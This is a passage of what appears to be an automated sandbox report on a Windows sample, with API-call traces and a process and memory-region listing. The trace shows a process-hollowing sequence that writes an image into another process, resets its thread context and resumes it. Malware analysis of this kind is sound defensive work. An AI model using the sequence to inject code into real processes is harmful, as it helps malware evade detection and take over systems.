[252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0310.532] ReadProcessMemory (in: hProcess=0x30, lpBaseAddress=0x4f2008, lpBuffer=0x18194c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18194c*, lpNumberOfBytesRead=0x0) returned 1 [0310.532] VirtualAlloc (lpAddress=0x0, dwSize=0x22000, flAllocationType=0x3000, flProtect=0x40) returned 0xae0000 [0310.534] VirtualAllocEx (hProcess=0x30, lpAddress=0x400000, dwSize=0x22000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0310.534] VirtualAllocEx (hProcess=0x30, lpAddress=0x0, dwSize=0x22000, flAllocationType=0x3000, flProtect=0x40) returned 0x1d0000 [0310.535] memcpy (in: _Dst=0xae0000, _Src=0x182ed4, _Size=0x200 | out: _Dst=0xae0000) returned 0xae0000 [0310.535] memcpy (in: _Dst=0xae2000, _Src=0x1830d4, _Size=0x1b000 | out: _Dst=0xae2000) returned 0xae2000 [0310.538] memcpy (in: _Dst=0xafe000, _Src=0x19e0d4, _Size=0x600 | out: _Dst=0xafe000) returned 0xafe000 [0310.538] memcpy (in: _Dst=0xb00000, _Src=0x19e6d4, _Size=0x200 | out: _Dst=0xb00000) returned 0xb00000 [0310.538] WriteProcessMemory (in: hProcess=0x30, lpBaseAddress=0x1d0000, lpBuffer=0xae0000*, nSize=0x22000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0xae0000*, lpNumberOfBytesWritten=0x0) returned 1 [0310.548] VirtualProtectEx (in: hProcess=0x30, lpAddress=0x1d0000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x1818e8 | out: lpflOldProtect=0x1818e8*=0x40) returned 1 [0310.573] VirtualProtectEx (in: hProcess=0x30, lpAddress=0x1d2000, dwSize=0x1ae4c, flNewProtect=0x20, lpflOldProtect=0x1818e8 | out: lpflOldProtect=0x1818e8*=0x40) returned 1 [0310.576] VirtualProtectEx (in: hProcess=0x30, lpAddress=0x1ee000, dwSize=0x4a0, flNewProtect=0x2, lpflOldProtect=0x1818e8 | out: lpflOldProtect=0x1818e8*=0x40) returned 1 [0310.576] VirtualProtectEx (in: hProcess=0x30, lpAddress=0x1f0000, dwSize=0xc, flNewProtect=0x2, lpflOldProtect=0x1818e8 | out: lpflOldProtect=0x1818e8*=0x40) returned 1 [0310.576] VirtualFree (lpAddress=0xae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0310.580] WriteProcessMemory (in: hProcess=0x30, lpBaseAddress=0x4f2008, lpBuffer=0x18197c*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18197c*, lpNumberOfBytesWritten=0x0) returned 1 [0310.583] SetThreadContext (hThread=0x38, lpContext=0x18155c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x4f2000, Edx=0x0, Ecx=0x0, Eax=0x1ece46, Ebp=0x0, Eip=0x778a8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0310.583] ResumeThread (hThread=0x38) returned 0x1 [0310.583] CloseHandle (hObject=0x30) returned 1 [0310.584] CloseHandle (hObject=0x38) returned 1 [0310.584] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2eb8 | out: hHeap=0x5a0000) returned 1 [0310.584] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2328 | out: hHeap=0x5a0000) returned 1 [0310.602] GetModuleHandleW (lpModuleName=0x0) returned 0x1140000 [0310.602] GetModuleHandleW (lpModuleName=0x0) returned 0x1140000 [0310.691] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4f20 | out: hHeap=0x5a0000) returned 1 [0310.691] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b5020 | out: hHeap=0x5a0000) returned 1 [0310.691] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4fe0 | out: hHeap=0x5a0000) returned 1 [0310.691] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b3320 | out: hHeap=0x5a0000) returned 1 [0310.691] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4ee0 | out: hHeap=0x5a0000) returned 1 [0310.691] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5aa530 | out: hHeap=0x5a0000) returned 1 [0310.691] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4ff0 | out: hHeap=0x5a0000) returned 1 [0310.692] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b3c88 | out: hHeap=0x5a0000) returned 1 [0310.692] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b3140 | out: hHeap=0x5a0000) returned 1 [0310.692] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a8b70 | out: hHeap=0x5a0000) returned 1 [0310.727] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a3628 | out: hHeap=0x5a0000) returned 1 [0310.727] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a7be8 | out: hHeap=0x5a0000) returned 1 [0310.727] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2dd0 | out: hHeap=0x5a0000) returned 1 [0310.727] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a7610 | out: hHeap=0x5a0000) returned 1 [0310.746] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5aa9a0 | out: hHeap=0x5a0000) returned 1 [0310.764] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b3480 | out: hHeap=0x5a0000) returned 1 [0310.764] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x77730000 [0310.841] GetProcAddress (hModule=0x77730000, lpProcName="AppPolicyGetProcessTerminationMethod") returned 0x0 [0310.905] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fef0 | out: phModule=0x19fef0) returned 0 [0312.268] GetCurrentThreadId () returned 0xbe0 [0314.005] GetProcessHeap () returned 0x5a0000 [0314.005] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5aa680) returned 1 [0314.005] GetProcessHeap () returned 0x5a0000 [0314.005] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5aa650) returned 1 [0314.005] GetProcessHeap () returned 0x5a0000 [0314.006] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5b0878) returned 1 [0314.006] GetProcessHeap () returned 0x5a0000 [0314.006] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5a9b90) returned 1 [0314.007] GetProcessHeap () returned 0x5a0000 [0314.007] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5af870) returned 1 [0314.007] GetProcessHeap () returned 0x5a0000 [0314.007] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5aa698) returned 1 [0314.007] GetProcessHeap () returned 0x5a0000 [0314.007] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5aa668) returned 1 [0314.007] GetProcessHeap () returned 0x5a0000 [0314.007] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5aa638) returned 1 [0314.007] GetProcessHeap () returned 0x5a0000 [0314.007] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5aa758) returned 1 [0314.007] GetProcessHeap () returned 0x5a0000 [0314.007] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5aa5f0) returned 1 [0314.025] ExitProcess (uExitCode=0x0) [0314.171] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4f30 | out: hHeap=0x5a0000) returned 1 [0314.172] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2df8 | out: hHeap=0x5a0000) returned 1 [0314.187] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b0c90 | out: hHeap=0x5a0000) returned 1 Thread: id = 137 os_tid = 0x794 Process: id = "7" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6a915000" os_pid = "0x894" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xf94" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3391 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3392 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3393 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3394 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3395 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3396 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3397 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 3398 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 3399 start_va = 0x7ff6880d0000 end_va = 0x7ff6880e0fff monitored = 0 entry_point = 0x7ff6880d16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 3400 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3401 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 3402 start_va = 0x7ffda7d40000 end_va = 0x7ffda7f27fff monitored = 0 entry_point = 0x7ffda7d6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3403 start_va = 0x7ffda8a30000 end_va = 0x7ffda8adcfff monitored = 0 entry_point = 0x7ffda8a481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3404 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3405 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 3406 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3407 start_va = 0x7ffdaae30000 end_va = 0x7ffdaaeccfff monitored = 0 entry_point = 0x7ffdaae378a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3408 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3409 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3410 start_va = 0x190000 end_va = 0x196fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 3411 start_va = 0x7ffd9fc30000 end_va = 0x7ffd9fc88fff monitored = 0 entry_point = 0x7ffd9fc3fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3412 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3413 start_va = 0x7ffda9000000 end_va = 0x7ffda927cfff monitored = 0 entry_point = 0x7ffda90d4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3414 start_va = 0x7ffda8ba0000 end_va = 0x7ffda8cbbfff monitored = 0 entry_point = 0x7ffda8be02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3415 start_va = 0x7ffda7cd0000 end_va = 0x7ffda7d39fff monitored = 0 entry_point = 0x7ffda7d06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3416 start_va = 0x7ffda8ea0000 end_va = 0x7ffda8ff5fff monitored = 0 entry_point = 0x7ffda8eaa8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3417 start_va = 0x7ffdab400000 end_va = 0x7ffdab585fff monitored = 0 entry_point = 0x7ffdab44ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3418 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3419 start_va = 0x7ffda96b0000 end_va = 0x7ffda97f2fff monitored = 0 entry_point = 0x7ffda96d8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3420 start_va = 0x7ffdab030000 end_va = 0x7ffdab08afff monitored = 0 entry_point = 0x7ffdab0438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3421 start_va = 0x7ffda89f0000 end_va = 0x7ffda8a2afff monitored = 0 entry_point = 0x7ffda89f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: 